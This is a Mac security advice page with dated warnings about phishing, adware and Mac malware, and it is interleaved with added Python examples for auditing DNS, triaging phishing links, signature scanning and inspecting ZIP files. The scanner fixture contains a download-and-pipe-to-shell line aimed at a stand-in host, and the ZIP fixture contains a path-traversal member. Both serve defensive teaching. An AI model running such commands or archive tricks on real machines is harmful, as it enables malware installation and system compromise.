Security

Briefly:

Install updates
Click cautiously
Use Chrome or Firefox
Back up

Urgent

(Nov 2014) Even more security holes have been found in Macs. Be very suspicious if a dialog box pops up asking you for passwords or personal information, or telling you that you need to update some software.

(Oct 2014) There have been lots of scary news articles about Mac security recently. The "shellshock" bug in the bash shell posed little threat to Mac users who have not turned on advanced Unix services such as remote login. The "iWorm" malware only hit Mac users who installed pirated software -- don't do that. The "POODLE" bug let an attacker on the same network downgrade an HTTPS connection to the obsolete SSL 3.0 protocol and recover session cookies or credentials, which is one more reason not to use untrusted WiFi. Apple released fixes for shellshock and POODLE, and updated its download protection (XProtect) against iWorm.

(Sep 2014) I got a very realistic fake email claiming to be from Apple: it said "the password for your AppleID has been reset. If this wasn't you, go to this link and set it back." Many other people are getting this too. I noticed that the link in the mail didn't go to Apple. If I had clicked, they would have asked for my old password and security questions and been able to steal money from me, look at my online data and pictures, and get more mail addresses to attack others. If you get a message like this, don't click. Open up iCloud.com by typing the name in the address bar -- only from a safe WiFi or wired connection (also check that the lock shows in the URL bar) and verify that your old password is still good.

(Jul 2014) I am getting phishing email that claims to be from EZ-Pass. It says "You have not paid for driving on a toll road. This invoice is sent repeatedly." The first one was sent from a web server in Germany. Another was sent from England. They are trying to get me to click on a web page. No thanks.

(Jul 2014) Don't download software from CNET's Download.com. Its downloader bundles software you didn't ask for, which hijacks your browser's search engine, installs adware, and who knows what else. (Story from MacInTouch; look for "spigot.") Don't download a program called "Genieo," which inserts ads into pages you view in your web browser. Don't download a Safari extension called "Awesome Screenshot," which does the same. Other sites that bundle adware with your downloads include Softonic and pirate torrent sites.

(Jan 2014) Some home routers have "back doors" built into them by their manufacturers. Make sure yours isn't one. Here is a page with more detail on the problem. A back door lets a bad guy take over your router and silently redirect your web browsing to fake sites, for example by changing the DNS servers the router hands out: they could spoof your online banking site and steal your money, or do other bad things. If your router has a manufacturer back door, replace it. On your Mac, change your DNS servers from the default (usually the router itself) to OpenDNS or Google DNS. On your router, put a password on your Wi-Fi network (WPA2), change the router's administrator password from the vendor default, and disable remote (WAN-side) management. If you use a router you do not control, like public Wi-Fi, it could be hacked: use HTTPS browsing only, and be cautious.
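A way to see which DNS servers a Mac is actually using, as an added Python example that is not part of this page: it parses the output of `scutil --dns` (a constructed sample in that format; the 192.168.1.1 and 203.0.113.9 addresses are made up) and classifies each resolver as one of the OpenDNS/Google addresses recommended above, a private-network address (meaning the router, which says whatever it has been told to say), or some other server you did not choose. The fix_command helper builds the real `networksetup -setdnsservers` invocation; the service name "Wi-Fi" is an assumption (older OS X releases called it "AirPort").

```python
"""Audit the DNS servers a Mac is using, from `scutil --dns` output."""
import ipaddress
import re

# Resolvers recommended above: OpenDNS and Google Public DNS.
KNOWN_GOOD = {
    "208.67.222.222": "OpenDNS", "208.67.220.220": "OpenDNS",
    "8.8.8.8": "Google DNS", "8.8.4.4": "Google DNS",
}

# RFC 1918 ranges: a resolver here is the home router (or something on the LAN).
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in the shape `scutil --dns` prints on OS X (abridged);
# the addresses are made up for the demonstration.
SAMPLE_SCUTIL = """\
DNS configuration

resolver #1
  search domain[0] : home
  nameserver[0] : 192.168.1.1
  if_index : 4 (en0)
  flags    : Request A records
  reach    : 0x00020002 (Reachable,Directly Reachable Address)

resolver #2
  domain   : local
  options  : mdns
  timeout  : 5
  flags    : Request A records
  reach    : 0x00000000 (Not Reachable)

DNS configuration (for scoped queries)

resolver #1
  nameserver[0] : 192.168.1.1
  nameserver[1] : 203.0.113.9
  if_index : 4 (en0)
"""

NAMESERVER_RE = re.compile(r"^\s*nameserver\[\d+\]\s*:\s*(\S+)", re.MULTILINE)


def parse_nameservers(text):
    """Distinct name server addresses, in the order they first appear."""
    seen = []
    for addr in NAMESERVER_RE.findall(text):
        if addr not in seen:
            seen.append(addr)
    return seen


def classify(addr):
    """'known-good' (OpenDNS/Google), 'router' (LAN address, so DNS is
    whatever the router says), or 'unknown' (a public server you did not pick)."""
    if addr in KNOWN_GOOD:
        return "known-good"
    ip = ipaddress.ip_address(addr)
    if any(ip in net for net in RFC1918) or ip.is_link_local:
        return "router"
    return "unknown"


def audit(text):
    """Map each configured resolver to its classification."""
    return {addr: classify(addr) for addr in parse_nameservers(text)}


def fix_command(service="Wi-Fi", provider="OpenDNS"):
    """The networksetup command that pins the resolvers for one network service.
    'Wi-Fi' is the service name on recent OS X; older releases used 'AirPort'."""
    servers = [a for a, p in KNOWN_GOOD.items() if p == provider]
    return "networksetup -setdnsservers %s %s" % (service, " ".join(servers))


if __name__ == "__main__":
    for addr, kind in audit(SAMPLE_SCUTIL).items():
        print("%-16s %s" % (addr, kind))
    print("To fix:", fix_command())
```

On a real Mac, feed it `subprocess.check_output(["scutil", "--dns"], text=True)` instead of the sample. A "router" result is not itself an infection, but it does mean a compromised router controls where every site name resolves, which is exactly the attack described above.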

Criminals are working hard to get you to run their programs on your Mac. If you click on a link in a malicious e-mail or view a web page that contains an attack, your computer can be infected with malware. This can cost you money and time, get you in trouble with friends and the law, steal your identity, or mess up your computer.

If Facebook, or any web page, says you should install a Flash upgrade or a Video Codec, DON'T CLICK IT. Don't Install "Mac Defender", or similar fake anti-virus scareware.

Mac Specific Advice

To update Apple software, start with the Apple menu ► Software Update. To update non-Apple software safely, restart your browser, type the URL of the company's own website (e.g. java.com) into the address bar yourself, and find and download the update there; never use an update link that arrived in mail or in a popup. Adobe Flash has an "automatic update" option. Turn it on.

Here is a useful page on malware: Mac Malware Guide: Am I Infected? Also, please read my pages on Loss Protection and backup.

My Mac Security Practices

Because I am a "security guy," I put up with some inconvenience to keep my computers more secure. Everyone's security situation is different, and these tactics may be too much, or not enough, for people with different concerns. The measures you should take depend on what you are trying to defend against, and the value to you of the information on your computer that you want to protect. (Many of these measures also work or have analogues on other systems such as Linux and Unix.) Some of these steps may be too detailed for the general reader, but perhaps they will suggest the complexity of the security problem and the need to use multiple solutions.

Things I Am Not Doing Yet

Apple has produced Security Configuration Guides for OS versions from 10.3 (Panther) to 10.6 (Snow Leopard), developed with advice from the NSA. They are very thorough. There are some security measures that I have not chosen, after considering my security risks:

General

Here is a good set of Safety Tips from Sophos.

Almost all Mac malware out there consists not of viruses but of Trojan Horses: programs that trick YOU into typing your admin password and installing them. For example, if you get a mail message that says "From: Microsoft" and has a link to click that will update Microsoft Word, DON'T. Similarly for mail that appears to be from PayPal, eBay, or your bank. (Mail senders can be forged. Links in mail may not go where they claim: the visible text can show one address while the link goes to another.) If you're browsing a web page and you get a popup window that wants you to update your Flash player, DON'T. (There are multiple fake updaters for Flash, some spread via Facebook.) There are current attacks on Macs that do these things.
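The link check described in the Sep 2014 Apple ID note above and in this paragraph, as an added Python example that is not part of this page: it parses a constructed phishing mail (the sender address, host names and IP address are made up for illustration) and reports, for each link, whether the visible text names one host while the href goes to another, whether the link points at a bare IP address or hides its real host behind user@host syntax, and whether the sender and link domains match the brand the mail claims to be from. The registrable_domain helper keeps only the last two labels of a host name, a simplification chosen for this example (it ignores multi-part suffixes such as co.uk).

```python
"""Triage the links in a suspicious e-mail before anyone clicks them."""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the "your Apple ID password was reset" mail
# described above; sender, host names and the IP address are made up.
SAMPLE_MAIL = b"""\
From: "Apple Support" <support@apple-id-verify.example>
To: victim@example.org
Subject: Your Apple ID password has been reset
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body>
<p>The password for your Apple ID has been reset. If this wasn't you,
<a href="http://198.51.100.23/icloud/login">https://iforgot.apple.com</a>
and set it back.</p>
<p><a href="https://appleid.apple.com.account-check.example/reset">Manage your account</a></p>
<p><a href="https://www.apple.com/support/">Apple Support</a></p>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Last two labels of a host name (simplification: ignores suffixes like co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def host_of(url):
    return urlsplit(url).hostname or ""


def is_ip_literal(host):
    return re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host) is not None


def check_link(href, text, claimed_domain):
    """Return the reasons this link is suspicious (empty list if it looks fine)."""
    reasons = []
    host = host_of(href)
    if not host:
        return ["link has no host name"]
    if is_ip_literal(host):
        reasons.append(f"link points at a bare IP address {host}")
    if urlsplit(href).username:
        reasons.append("link hides its real host behind user@host syntax")
    if registrable_domain(host) != claimed_domain:
        reasons.append(f"link goes to {host}, not {claimed_domain}")
    # Visible text that looks like a URL or host name but differs from the real target.
    shown = text.strip()
    if shown.startswith(("http://", "https://")) or re.fullmatch(r"[\w.-]+\.\w+", shown):
        shown_host = host_of(shown) if "://" in shown else shown
        if registrable_domain(shown_host) != registrable_domain(host):
            reasons.append(f"shows {shown_host} but goes to {host}")
    return reasons


def triage(raw_mail, claimed_domain):
    """Check the sender and every link against the brand the mail claims to be from."""
    msg = email.message_from_bytes(raw_mail, policy=policy.default)
    findings = {}
    sender_host = msg["From"].addresses[0].domain if msg["From"] else ""
    if registrable_domain(sender_host) != claimed_domain:
        findings["sender"] = [f"From: is {sender_host}, not {claimed_domain} (forgeable either way)"]
    body = msg.get_body(preferencelist=("html",))
    collector = _LinkCollector()
    collector.feed(body.get_content() if body else "")
    for href, text in collector.links:
        reasons = check_link(href, text, claimed_domain)
        if reasons:
            findings[href] = reasons
    return findings


if __name__ == "__main__":
    for target, reasons in triage(SAMPLE_MAIL, "apple.com").items():
        print(target)
        for reason in reasons:
            print("   -", reason)
```

Run against the sample, the first two links and the sender are reported and the genuine www.apple.com link produces nothing. A link that passes every check is still not proof of safety, which is why the advice above to type iCloud.com into the address bar yourself stands.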

I have written elsewhere about general suggestions on home computer security. Summary:

Use common sense when surfing and clicking; that avoids most malware problems. Don't enter sensitive information, like credit card numbers, into untrusted or insecure web pages. Be suspicious. Watch out for scams and fraud. Here is a nice article: Mac security: scams and fraud.

Anti-Malware Packages

I installed the free version of the ClamXAV anti-malware scanner on my Mac. This program does not splice into Mail or the file system to watch for new files: it only scans directories you point it at. So far it has not found any problems on my computer when I use it to check attachments sent to me by others.

There are two kinds of malware checker. On-demand scanners check your whole hard drive, or selected files, when you tell them to. On-access scanners hook into programs on your computer, such as Mail, and into the file system, and check files as they arrive; to do this they have to attach to applications and system facilities in ways that the malware cannot bypass. Such hooks are sometimes broken by OS updates, cause problems using your computer, or consume excessive resources.

Anti-malware programs' definition files must be updated very often in order to be useful. Anti-malware companies constantly capture and analyze new malware that is designed to evade existing detectors, then update their definitions and detection methods and make the updates available to you. Your computer can be attacked in the window before the update that recognizes the new malware reaches you. Recently, several variants of one malware family have been released in a single day, faster than the definitions can be updated to catch them. See Rich Mogull's article "Do You Need Mac Antivirus Software in 2013?" for his view.
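An added example (not code from this page or from any anti-malware vendor) of why definitions age so fast: a toy scanner with two kinds of signature, an exact SHA-256 of a captured sample and a byte pattern for the behaviour, run over constructed samples. The "malware" is just a made-up shell one-liner that downloads and runs a second stage; the definition names Dropper.A and Dropper.Gen are invented for the demonstration.

```python
"""Toy signature scanner: an exact-hash definition misses a one-byte variant."""
import hashlib
import re

# Constructed samples. SAMPLE_B is SAMPLE_A with one word changed, the kind of
# trivial variant that attackers release several of in a day.
SAMPLE_A = b"#!/bin/sh\ncurl -s http://dropper.example/stage2 | sh\n"
SAMPLE_B = SAMPLE_A.replace(b"stage2", b"stage3")
CLEAN = b"#!/bin/sh\necho hello\n"

# Definition set v1: only an exact hash of the sample the vendor captured.
DEFS_V1 = {
    "hashes": {hashlib.sha256(SAMPLE_A).hexdigest(): "Dropper.A"},
    "patterns": {},
}

# Definition set v2: adds a generic pattern for "fetch something and pipe it to a shell",
# which also catches variants the vendor has never seen.
DEFS_V2 = {
    "hashes": dict(DEFS_V1["hashes"]),
    "patterns": {"Dropper.Gen": re.compile(rb"curl\s+-s\s+http://[^\s|]+\s*\|\s*sh")},
}


def scan(data, defs):
    """Return the name of the first matching definition, or None if nothing matches."""
    name = defs["hashes"].get(hashlib.sha256(data).hexdigest())
    if name:
        return name
    for name, pattern in defs["patterns"].items():
        if pattern.search(data):
            return name
    return None


def scan_all(samples, defs):
    """Scan a dict of label -> bytes and report what each sample matched."""
    return {label: scan(data, defs) for label, data in samples.items()}


if __name__ == "__main__":
    samples = {"A": SAMPLE_A, "B (variant)": SAMPLE_B, "clean": CLEAN}
    print("v1 definitions:", scan_all(samples, DEFS_V1))
    print("v2 definitions:", scan_all(samples, DEFS_V2))
```

With v1 the variant slips through; with v2 both are caught and the clean script is not. Real products use much richer signatures and heuristics, but the gap between a sample appearing and a definition that covers its variants is the window the paragraph describes.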

Mac anti-malware packages are available from ESET, Sophos, Intego, F-Secure, PC Tools, BitDefender, McAfee, ClamXav, Norton, SecureMac, and Avast!. They all claim to be the best.

Beware: the bad guys are sending out spam email offering you fake anti-virus software. I get a couple of these a day. If you install it, it may pretend to work, while taking over your system.

Recent Mac Malware

(Jun 2014) A researcher demonstrated an attack that steals Comcast account credentials if you come within range of an "evil twin" hotspot. Somebody could set up an access point named "xfinity" or "att" and your device would trust the name and join it. AT&T configures iPhones to connect automatically to its hotspots. Configure your Mac and iPhone/iPad not to join networks without asking. If your device wants to connect to a network, be cautious; if the network asks you for your account credentials, be aware that it could be a password stealer.

(Mar 2014) Microsoft announced that there is a security hole in Rich Text Format (RTF) files that hackers are actively exploiting. Don't click on any downloaded .rtf files, and stay tuned. See Microsoft Security Advisory KB 2953095.

(Jan 2014) There are "undelivered item" emails being sent that contain links that will install Mac malware without asking you for a password. The malware gives complete access to all files on your Mac to the bad guys, and lets them run any command, including installing more malware. Be vigilant, and use Firefox or Chrome instead of Safari.

(Jan 2014) Some users of the Chrome browser who installed third-party extensions are being flooded with spam, which could include ads that send the user to infection sources. This happens when spammers buy the rights to a formerly-trusted extension from the developer, and send an automatic update that adds the spamming. Be cautious about which browser add-ons you choose.

(Nov 29, 2013) Many people are getting forged mail or text messages, ostensibly from Google, saying "your mail has been hacked." Forged messages from UPS, banks, etc. with ZIP attachments containing virus droppers are also spreading: I get a few a week. Don't open ZIP attachments unless you are sure they are not forged; scan such files for viruses before using them.
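How to look inside a ZIP attachment without extracting or running anything in it, as an added Python example that is not from this page: it builds a constructed attachment in memory (filler bytes, with names modelled on the "undelivered parcel" lure) and flags double extensions such as .pdf.exe, Mac .app bundles, member paths that would escape the extraction directory, and extreme compression ratios. The extension lists and the 100:1 ratio threshold are choices of this example, not standards.

```python
"""Inspect a ZIP attachment's table of contents before deciding whether to open it."""
import io
import posixpath
import zipfile

# Extensions that run code on a Mac or Windows machine, and document-looking ones
# that attackers put in front of them (choices of this example).
RISKY_EXTENSIONS = {".exe", ".scr", ".jar", ".js", ".vbs", ".bat", ".cmd",
                    ".command", ".sh", ".pkg", ".dmg", ".app"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".jpg", ".png", ".txt"}


def build_sample_zip():
    """Constructed attachment: harmless filler bytes, only the names and sizes matter."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("UPS_Invoice.pdf.exe", b"MZ" + b"\x00" * 200)                    # double extension
        z.writestr("Parcel.app/Contents/MacOS/Parcel", b"\xcf\xfa\xed\xfe" + b"\x00" * 200)  # app bundle
        z.writestr("../../Library/LaunchAgents/evil.plist", b"<plist/>")          # path traversal
        z.writestr("padding.bin", b"\x00" * 2_000_000)                              # zip-bomb ratio
        z.writestr("photo.jpg", b"\xff\xd8\xff" + bytes(range(256)) * 4)            # looks normal
    return buf.getvalue()


def suffixes(filename):
    """All dotted suffixes of the base name: 'a.pdf.exe' -> ['.pdf', '.exe']."""
    pieces = posixpath.basename(filename).split(".")
    return ["." + p.lower() for p in pieces[1:]] if len(pieces) > 1 else []


def inspect_zip(data, max_ratio=100, max_total=50_000_000):
    """Return {member name: [reasons]} for members that deserve suspicion."""
    findings = {}
    total_uncompressed = 0
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            reasons = []
            total_uncompressed += info.file_size
            # Members that would be written outside the folder you extract into.
            if name.startswith("/") or posixpath.normpath(name).startswith(".."):
                reasons.append("path escapes the extraction directory")
            # Anything under Something.app/ is part of a Mac application bundle.
            if any(c.lower().endswith(".app") for c in name.split("/")[:-1]):
                reasons.append("member is inside a Mac application bundle (.app)")
            sfx = suffixes(name)
            if sfx and sfx[-1] in RISKY_EXTENSIONS:
                reasons.append(f"executable type {sfx[-1]}")
            if len(sfx) >= 2 and sfx[-2] in DOCUMENT_EXTENSIONS and sfx[-1] in RISKY_EXTENSIONS:
                reasons.append(f"double extension disguises {sfx[-1]} as a {sfx[-2]} document")
            # A tiny member that expands enormously is the classic zip-bomb shape.
            if info.compress_size and info.file_size / info.compress_size > max_ratio:
                reasons.append(f"compression ratio {info.file_size // info.compress_size}:1 (possible zip bomb)")
            if reasons:
                findings[name] = reasons
    if total_uncompressed > max_total:
        findings["<archive>"] = [f"expands to {total_uncompressed} bytes"]
    return findings


if __name__ == "__main__":
    for member, reasons in inspect_zip(build_sample_zip()).items():
        print(member)
        for reason in reasons:
            print("   -", reason)
```

Only the table of contents is read; no member is written to disk or executed. A clean report is not a guarantee (a .docx exploiting a Word hole looks like a document), so a virus scan before opening, as advised above, still applies.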

(Aug 6, 2013) There are new phishing scam emails: one that says "your account has been suspended" and appears to come from Apple, and one that appears to be a connection request on LinkedIn. Don't click links in email unless you are sure they are not forged.

(January 2013) Two vulnerabilities in Ruby on Rails made over 200,000 websites exploitable. Clicking on an infected website could lead to multiple attacks: some might try to spoof popup windows that ask for your password, and others might find a hole that can be exploited without asking. Hacking toolkits are expected to exploit both holes soon. Click cautiously and apply security patches when available.

(August 2012) More malware that can infect Macs has been discovered. Click cautiously and apply security patches when available.

(Apr-June 2012) The FBI is investigating cases where malware was installed on travelers' laptops through application software updates on hotel internet connections. Several Trojan Horse attacks are also being distributed via infected Microsoft Word files. Make sure you apply the latest update to Word 2011. (Only Snow Leopard and below are vulnerable to this attack.) There is also a serious security threat that attacks Macs that just visit an infected web page: the malware tries to steal financial passwords from your computer. It has been estimated that over 500,000 Macs have been infected. Protect your computer by installing the Apple update for Java from the Apple menu ► Software Update. See the page on The Flashback Malware for detailed instructions.
(Jan 2014) There are still 22,000 Macs infected by Flashback.

(April 2012) There are recent attacks on Macs that send infected Word documents in e-mail attachments. These exploit a hole that Microsoft patched years ago. Make sure your Microsoft products are up-to-date, by using the built-in Microsoft updater.

(March 2012) The various incarnations of the Flashback Trojan use ever-changing tricks to get you to install it. Visit a hacked website, and you may see dialog boxes requesting your admin password with various excuses (such as a fake password dialog box from "Software Update"), or you may see a request to accept a certificate that claims to be from Apple but is not. If you get fooled, you are in big trouble: the Trojan will install code into your browser so it can steal your banking passwords and watch your traffic. Many blogs have been hacked recently, to send malware to your browser or redirect it to a malicious page that does so. Using Firefox with FlashBlock and NoScript, or Chrome with ScriptNo, will help catch these attacks. OpenDNS will also prevent access to some malicious URLs. Make sure you have Java up to date, and do not accept fake (self-signed) Apple certificates.

Don't Be Complacent

Macs used to have fewer security problems than Windows because hackers concentrated on the flaws in Windows, but those days have passed. Over time, Windows has improved, and Apple should be working hard to improve also. Mac OS, Windows, Linux, and other Unix descendants are all written in the C language using informal processes. Brilliant programmers have failed to produce secure systems using this approach in many years of trying.

It is your responsibility to keep informed about your computer's security. Attackers will continue to try new ways to break into your computer and your online accounts. Even if you were fully protected yesterday, some new attack might be discovered tomorrow.

I think Microsoft does a better job with their code auditing than folks like Apple do. We've only seen a scratching of the surface as far as Apple vulnerabilities because nobody cares to find them. There's nothing inherent with Apple themselves and their development.
-- Marc Maiffret, former hacker

© 2010-2014, Tom Van Vleck. Updated 2014-11-13 11:47